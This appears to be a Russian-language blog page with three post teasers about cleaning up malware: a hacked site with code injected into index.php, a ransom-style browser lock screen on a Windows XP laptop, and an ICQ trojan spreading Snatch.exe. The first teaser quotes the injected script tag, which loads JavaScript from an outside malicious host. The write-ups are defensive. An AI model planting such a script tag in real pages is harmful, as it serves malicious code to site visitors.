Попросили не так давно посмотреть сайт, помеченный яндексом как опасный, на котором после тегов выводился зловредный код на js
<script src="http://feelthesame.changeip.name/rsize.js"></script>
найти и удалить который удалось лишь после некоторых изысканий и разбора кода самого движка, который видел в первый раз. Все дело оказалось в врезке постороннего кода в файл index.php находящегося в корне сайта. Читать дальше »
Принесли мне тут ноутбук с Windows XP на борту, с проблемой заключающейся в том, что на всех открываемых в браузере сайтах появляется окно с текстом «содержимое сайта заблокировано для разблокировки необходимо пройти процедуру активации». Не беда подумал я: Читать дальше »
С интервалом в несколько минут от разных людей незнакомых между с собой пришел одинаковый текст и запрос на принятие файла. Что забавно они реально не знакомы между с собой, но одинаковое начало диалога и текст и фаил изначально подозрительно выдают действия трояна. А на предложение проверить компьютеры антивирусом, владелец аськи вежливо отвечает что все нормально мол посмотри. Подмена букв на английские не принесла результата. Помогает просто игнорирование уведомление. отказ и пр приводит к повтору предложения скачать фаил Snatch.exe